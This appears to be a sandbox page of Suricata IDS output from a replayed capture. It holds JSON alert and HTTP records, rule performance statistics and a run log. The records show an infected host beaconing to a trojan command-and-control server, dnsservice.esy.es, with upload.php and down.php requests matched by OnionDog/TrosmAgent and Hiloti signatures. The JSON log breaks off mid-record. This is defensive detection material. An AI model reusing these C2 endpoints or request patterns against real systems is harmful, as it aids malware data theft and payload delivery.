{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"pcap_cnt":70,"event_type":"alert","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"pcap_cnt":70,"event_type":"http","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"alert","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"http","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"pcap_cnt":88,"event_type":"alert","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"pcap_cnt":88,"event_type":"http","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"alert","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"http","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.846564+0000","flow_id":1338560918587736,"pcap_cnt":111,"event_type":"alert","src_ip":"10.0.2.15","src_port":1056,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.846564+0000","flow_id":1338560918587736,"pcap_cnt":111,"event_type":"http","src_ip":"10.0.2.15","src_port":1056,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"alert","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"http","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.ph

This file has been truncated. Go here to download in full.


keyword_perf.log - (10996 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 8/13/2019 -- 12:11:13
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             244792612       40362           40362           4825588         6064.00         6064.00         0.00           
  content          518442102       75518           51883           10692354        6865.00         6972.00         6629.00        
  pcre             111064374       13203           3381            2284888         8412.00         9191.00         8143.00        
  byte_test        384082          67              52              26896           5732.00         6003.00         4792.00        
  byte_jump        92200           13              13              29150           7092.00         7092.00         0.00           
  isdataat         9666            2               0               4868            4833.00         0.00            4833.00        
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             244792612       40362           40362           4825588         6064.00         6064.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10925492        1668            846             99862           6550.00         7178.00         5903.00        
  pcre             20696           1               0               20696           20696.00        0.00            20696.00       
  byte_test        384082          67              52              26896           5732.00         6003.00         4792.00        
  byte_jump        92200           13              13              29150           7092.00         7092.00         0.00           
  isdataat         9666            2               0               4868            4833.00         0.00            4833.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          114106286       17066           12236           1047462         6686.00         6603.00         6894.00        
  pcre             73534050        9177            1610            424932          8012.00         8181.00         7976.00        
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          46630966        7196            1610            98192           6480.00         6459.00         6486.00        
  pcre             3787776         483             161             116890          7842.00         9982.00         6772.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1891768         322             0               34084           5875.00         0.00            5875.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          214742612       29624           24311           10692354        7248.00         7448.00         6335.00        
  pcre             28069478        2898            966             2284888         9685.00         11019.00        9018.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23064194        3542            2254            128342          6511.00         6662.00         6247.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2109652         322             322             46222           6551.00         6551.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39496512        5474            3542            6937554         7215.00         5985.00         9469.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          58972130        9177            5957            339280          6426.00         6737.00         5849.00        
  pcre             5652374         644             644             426900          8776.00         8776.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4928550         805             805             326028          6122.00         6122.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1573940         322             0               21144           4888.00         0.00            4888.00        


IDSDeathBlossom.py.log - (1204 bytes) - download
1
2
3
4
5
6
7
8
2019-08-13 12:10:45,763 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-08-13 12:10:46,568 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-08-13 12:10:46,568 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-08-13 12:10:46,569 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-08-13 12:10:46,569 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-08-13 12:10:46,569 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cf556455534924bd14168c1c670054f956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap -vvv -k none
2019-08-13 12:11:14,398 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-08-13 12:11:14,398 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 28.6444358826